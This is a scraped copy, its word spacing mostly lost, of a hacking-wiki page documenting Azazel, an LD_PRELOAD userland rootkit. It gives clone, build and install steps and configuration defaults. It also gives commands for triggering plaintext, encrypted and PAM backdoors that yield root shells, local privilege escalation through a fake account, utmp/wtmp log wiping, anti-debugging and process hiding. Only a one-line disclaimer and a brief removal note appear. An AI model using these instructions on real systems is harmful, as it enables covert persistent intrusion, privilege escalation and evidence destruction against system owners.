Azazel

Download as pdf or txt
Download as pdf or txt
You are on page 1of 6

Tweet

Azazel
FromSecurity101BlackhatTechniquesHackingTutorialsVulnerabilityResearchSecurityTools
AzazelisauserlandrootkitwritteninCbasedoffoftheoriginalLD_PRELOADtechniquefromJynxrootkit.Itis
morerobustandhasadditionalfeatures,andfocusesheavilyaroundantidebuggingandantidetection.Features
includelogcleaning,pcapsubversion,andmore.
Contents
1Disclaimer
2Features
3LatestSource
4HookingMethods
5Configuration
6BackdoorExamples
6.1Plaintextbackdoor
6.2Crypthookbackdoor
6.3PAMbackdoor
7LogClearing
8AntiDebugging
9ProcessHiding
10Preliminaryldd/unhideobfuscation
11Removal
12Related
Disclaimer
Itisacrimetousetechniquesortoolsonthispageagainstanysystemwithoutwritten
authorizationunlessthesysteminquestionbelongstoyou
Features
Antidebugging
Avoidsunhide,lsof,ps,ldddetection
Hidesfilesanddirectories
Hidesremoteconnections
Hidesprocesses
Hideslogins
PCAPhooksavoidlocalsniffing
TwoacceptbackdoorswithfullPTYshells.
Crypthookencryptedaccept()backdoor
Plaintextaccept()backdoor
PAMbackdoorforlocalprivescandremoteentry
Logcleanupforutmp/wtmpentriesbasedonpty
Usesxortoobfuscatestaticstrings
LatestSource
Clonethesources
Terminal
localhost:~$gitclonehttps://github.com/chokepoint/azazel.git
Buildtherootkit
Terminal
localhost:~$make
Running"makeinstall"willinjectthelivekitintoyoursystem.Whileremovalisnot
impossible,it'sanunnecessaryandpainfulprocedure,nottomentionyoumayforgetto
removeit.
HookingMethods
AzazelutilizesthesamehookingmethodsasJynx/Jynx2.Youcanhookindividualprogramsatthetimeof
executionbytakingadvantageoftheLD_PRELOADvariable.Bydefault,Azazelinstallsitselfaslibselinux.so
into/lib.Anentryisthenaddedto/etc/ld.so.preloadinordertohooksystemwidedynamicallycompiledprograms.
Exampleruntimehookingofbash.
Terminal
localhost:~$LD_PRELOAD=/lib/libselinux.sobashl
Insteadofdlsym'ingdirectlibcfunctionsbygloballydeclaringold_syscall,Azazelhasanewstructureinazazel.h
namedsyscall_list.Thisallowsalloftherequiredfunctionstobelinkeduponinitiationofthelibrary.Syscall
functionnamesareXORedbyconfig.pyandwrittentoconst.h.Originallibcfunctionscanbeaccessedbyusing
thepreprocessordefinitionsalsoinconst.h.EachdefinitionhasaprefixofSYS_name_of_function_in_caps.For
exampletocalllibc'sversionoffopen,youwouldusesyscalls[SYS_FOPEN].syscall_func()
typedef struct struct_syscalls {
char syscall_name[51];
void *(*syscall_func)();
} s_syscalls;
Configuration
Allvariablesthatrequirechangingpriortodeploymentarelocatednearthetopofconfig.py.Variabledatais
cipheredusinganXORkeyinordertonotexposethemtodumpingprogramslike"strings."Seebelowforalistof
variablesandtheirassociatedpurpose.
TherootkitwillhideallTCP/IPconnectionswithintheseHIGHandLOWportranges.
Theserangesareusedtonotonlyhidefromnetstat/lsof,butalsotohidefromsniffingusing
libpcap.
Numeric
Variable(s) Description Default
LOW_PORT/
HIGH_PORT
PortsusedtotriggerfullPTYplaintextbackdoor. 6104061050
CRYPT_LOW/
CRYPT_HIGH
PortsusedtotriggerfullPTYcrypthookbackdoor. 6105161060
PAM_PORT Alsohidesthisportbutdoesn'ttriggeracceptbackdoor. 61061
SHELL_MSG Displaythisstringtousersoncetheygetashell Welcome
SHELL_PASSWD Shellpasswordforbothplaintextandcrypthookbackdoors changeme
SHELL_TYPE Usethisshellforaccept()backdoors. /bin/bash
MAGIC_STRING Hideanyfileswiththisstringinthefilename. __
BLIND_LOGIN FakeuseraccountusedtoactivatethePAMbackdoor. rootme
ANTI_DEBUG_MSG Displaythismessagetothesysadminiftheytrytoptrace
Don'tscratchthe
walls.
CLEANUP_LOGS
Ifthisenvironmentvarissettoavalidpts,thencleanup
utmp/wtmplogsforthatpts.
CLEANUP_LOGS
Thefollowingvariablesarespecificallyincludedforthecrypthookbackdoor.
Numeric
Variable(s) Description Default
PASSPHRASE Thiskeyisusedforencryption/decryptionofsessions HelloNSA
KEY_SALT Keysaltusedforkeyderivation. changeme
BackdoorExamples
Foreachoftheseexamplesweareassumingthatsshdishookedwithazazelandabletotriggeranyofthethree
operationalbackdoors.
Plaintextbackdoor
WeneedtosetthelocalporttosomethingwithintherangesofLOW_PORTandHIGH_PORTasconfigured
above.Thisnotonlyensuresthattheconnectionwillbehiddenfromlocalsniffinganddetection,butitalsotriggers
afullPTYinteractiveshelluponenteringthecorrectpassword.Thelocalportcanbesetusingncat'spoption.
Uponsuccessfulyconnectingtotheremotedaemon,thefirstlineyouentershouldbetheSHELL_PASSWDthat
youcreated.
$ ncat target 22 -p 61040
changeme
Welcome!
Here's a shell.
root@host:/root #
Crypthookbackdoor
TriggeringtheCrypthookbackdoorissimilartotheplaintextbackdoor,butweneedtospeakthesameprotocol.
CrypthookisanAESencryptionwrapperforTCP/UDPconnectionsandcanbedownloadedfromhere.The
Crypthookreliesonpreloadhookingaswell,andcanbeusedwithnetcatbyutilizingLD_PRELOAD
environmentvariable.
$ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051
changeme
Welcome!
Here's a shell.
root@host:/root/ #
PAMbackdoor
ThePAMhooksworkbywaitingforthespecifiedfakeusertoattemptaconnection.Thehooksreturnthepw
entryforrootandacceptanypasswordtoestablishasuccessfullogin.Sincethismethodwouldgenerallybeused
withsshd,theconnectionwillnotbehiddenunlessyoucanforcesshclienttobindtoalocalportwithinoneofthe
portranges.Anotherclientsharedlibraryhasbeenincludedtoforceaprogramtobindtoaportthatwe'dliketo
hide.
$ make client
$ LD_PRELOAD=./client.so ssh rootme@localhost
root@host:/ #
ThePAMhookscanalsobeusedforlocalprivesc.
$ su - rootme
#
LogClearing
Logclearingcanbeaccomplishedbysettingtheenvironmentvariabletothetty/ptsdevicethatyouwanttoremove
fromtherecordsandthenexecutingacommand.Whenaccessingthetargetsystemusingeitheroftheaccept
backdoors,thegivenpseudoterminalisautomaticallyremovedfrombothutmpandwtmplogfiles.However,ifyou
needtousethePAMbackdoorthroughSSH,youwillneedtomanuallyremoveyourptsfromthelogsas
demonstratedbelow.
$ w | grep pts/16
root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
AntiDebugging
Azazelhooksptrace()andreturns1,hencedenyinganydebuggingfromoccuring.Themessagedisplayedtothe
sysadminisreallymoreofajokethananythingandwilldefinitelysetoffalarmsthatsomethingiswrong.
$ strace -p $PPID
Don't scratch the walls
Thisworksonanyuserlanddebugger(ltrace,strace,gdb,ftrace).Thishookcouldbeeasilyextendedtohide
specificinformationshouldyoudesiretodoso.
ProcessHiding
Jynx/Jynx2reliedonaspecifiedGIDinordertohideprocessesandfiles.Therearesomeobviousproblemswith
usingthismethod,soAzazeladdressesthisbyagainusingenvironmentvariablestomaskanyprocessesthatmay
giveawayourpresence.Thevariablecanalsobeconfiguredinsideofconfig.py,butdefaultsto
HIDE_THIS_SHELL.
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
Whenthisenvironmentvariableisset,theprocessisabletoseefilesandprocesseshiddenbytherootkit.Thisis
importantforthePAMhook.BecausePAMinvokesbashonitsown,youhavetousethisenvironmentvariableto
accesshiddenfiles.
Tweet
Preliminaryldd/unhideobfuscation
AzazelavoidsdetectionfromlddandunhidebyselectivelyNOThookingthosetwoprograms.Oncetheprograms
aredone,azazelcontinueshookingprogramsasnormal.Thisopensupawindowforremovingtheoffending
library,butatthispointitisbetterthancompletelyrevealingthekit.Thenextreleasewillincludeamoreadvanced
antidebug/ldd/unhideobfuscation.
Removal
ToremoveAzazel,thebestcourseofactionistobootintoalivecd,mountyourbootableharddrive,anddeletethe
/etc/ld_preload.sofilefromthepartition.
Related
Linux
LD_PRELOAD
C
CryptHook(http://www.chokepoint.net/2013/09/crypthooksecuretcpudpconnection.html)
Jynx
HookingPAM
Retrievedfrom"http://www.blackhatlibrary.net/Azazel"
Thispagewaslastmodifiedon14February2014,at02:34.

You might also like